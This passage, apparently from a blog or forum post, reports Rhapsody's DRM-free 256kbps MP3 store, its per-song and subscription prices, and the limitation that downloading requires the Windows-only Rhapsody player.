The MP3s are encoded at 256kbps, and cost no more than the standard DRM-crippled music (which is also 256kbps) at 89c/song for subscribing members, or 99c/song for non-subscribers (the subscription gives the ability to listen to streamed music on demand, starting at $13/month). Prices are US dollars, and I don't know whether the service is available internationally.

The bad news: downloading the music requires running the Rhapsody player software (version 4, just released) and at present it's only available on Windows. Online streaming is available to other OSes through http://rhapsody.com/ (works in Firefox, via a plugin) but the cross-platform Real Player software cannot access the music store, and last I tried it wouldn't run in wine.
